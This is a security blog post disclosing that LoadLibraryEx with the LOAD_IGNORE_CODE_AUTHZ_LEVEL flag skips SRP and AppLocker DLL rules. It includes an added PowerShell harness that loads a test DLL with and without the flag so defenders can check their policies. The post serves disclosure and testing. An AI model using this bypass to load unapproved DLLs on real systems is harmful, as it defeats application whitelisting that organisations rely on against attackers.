We’ve seen it countless times before. A vendor designs a security product, then punches a hole in the shield to accommodate developers. Still, I love the irony of it.
Software Restriction Policies (SRP) and AppLocker can be configured to whitelist DLLs. But LoadLibraryEx has a flag, LOAD_IGNORE_CODE_AUTHZ_LEVEL, that tells the loader to skip exactly those SRP and AppLocker checks for the DLL being loaded. From the MSDN documentation:
If this value is used, the system does not check AppLocker rules or apply Software Restriction Policies for the DLL. This action applies only to the DLL being loaded and not to its dependents. This value is recommended for use in setup programs that must run extracted DLLs during installation.
I’ve blogged about a spreadsheet that creates a DLL in a temporary location and loads it inside the Excel process with LoadLibrary. It’s easy to block that DLL with SRP or AppLocker. But it turns out this is also easy to bypass, much more easily than what I’ve done before: I just have to replace the call to LoadLibrary with a call to LoadLibraryEx and pass it the LOAD_IGNORE_CODE_AUTHZ_LEVEL flag. That’s all it takes to bypass SRP and AppLocker for that DLL.

Let it be clear that this only makes it possible to load arbitrary DLLs inside existing processes, it does not allow you to create a new process that SRP/AppLocker wouldn’t allow.
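The two calls described above, as an added PowerShell harness that is not code from the original post. It declares LoadLibraryW and LoadLibraryExW via P/Invoke, tries to load the same DLL both ways, and reports whether each attempt succeeded and which Win32 error a failed attempt returned, so you can check whether your own SRP/AppLocker DLL rules are affected. The DLL path is a placeholder you must supply; the flag value 0x10 is LOAD_IGNORE_CODE_AUTHZ_LEVEL as defined in the Windows SDK headers.

```powershell
# Added example, not from the original post. Compares a plain LoadLibrary with
# LoadLibraryEx(LOAD_IGNORE_CODE_AUTHZ_LEVEL) against the same DLL so you can
# see whether your SRP/AppLocker DLL rules still apply to the second call.

$signature = @'
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr LoadLibraryW(string lpFileName);

[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr LoadLibraryExW(string lpFileName, IntPtr hFile, uint dwFlags);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool FreeLibrary(IntPtr hModule);
'@
$Kernel32 = Add-Type -MemberDefinition $signature -Name 'Loader' -Namespace 'AppLockerTest' -PassThru

# Flag value from the Windows SDK (libloaderapi.h / winbase.h).
$LOAD_IGNORE_CODE_AUTHZ_LEVEL = [uint32]0x00000010

function Test-DllLoad {
    param(
        [Parameter(Mandatory)][string]$Path,
        [switch]$IgnoreCodeAuthz
    )
    if ($IgnoreCodeAuthz) {
        $handle = $Kernel32::LoadLibraryExW($Path, [IntPtr]::Zero, $LOAD_IGNORE_CODE_AUTHZ_LEVEL)
    } else {
        $handle = $Kernel32::LoadLibraryW($Path)
    }
    # Capture the error immediately, before anything else can overwrite it.
    $lastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()

    $loaded = $handle -ne [IntPtr]::Zero
    if ($loaded) {
        $null = $Kernel32::FreeLibrary($handle)
        $lastError = 0
    }

    [pscustomobject]@{
        Path            = $Path
        IgnoreCodeAuthz = $IgnoreCodeAuthz.IsPresent
        Loaded          = $loaded
        Win32Error      = $lastError
    }
}

# Placeholder path (assumption): an unsigned test DLL in a user-writable folder
# that your DLL rules do not allow, e.g. one you built yourself and dropped in %TEMP%.
$dll = Join-Path $env:TEMP 'test.dll'

Test-DllLoad -Path $dll
Test-DllLoad -Path $dll -IgnoreCodeAuthz
```

Run it in a non-elevated session as a user the rules actually apply to (the default AppLocker rules allow members of Administrators to run anything), and remember that AppLocker's DLL rule collection is not enforced unless you have explicitly enabled it. If the first call fails and the blocked attempt shows up in the Microsoft-Windows-AppLocker/EXE and DLL event log while the second call reports Loaded = True, the loader is honouring the flag exactly as documented. Note that the flag exempts only the named DLL: any further DLLs it imports are still checked, so a test DLL that pulls in other non-whitelisted DLLs will still fail on those.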
If you use SRP/AppLocker, should you worry? It depends on what risk you use it against.
When you use SRP/AppLocker to prevent common malware or other unwanted programs from infecting your machine, there’s no problem (now). If you use it on corporate computers to prevent your users from using software you don’t support, there’s no problem.
But if you use SRP/AppLocker as a security layer against skilled attackers, then you have to be aware that there is a large hole in that layer and that it is easy to abuse. In that case, you should look for another whitelisting security layer without “designer holes”. Unless it turns out Microsoft has a (hidden) setting to disable this feature, but I’ve not found one.
Full story: Didier Stevens
Posted on 24 January 2011. Tags: AppLocker, Circumventing, Design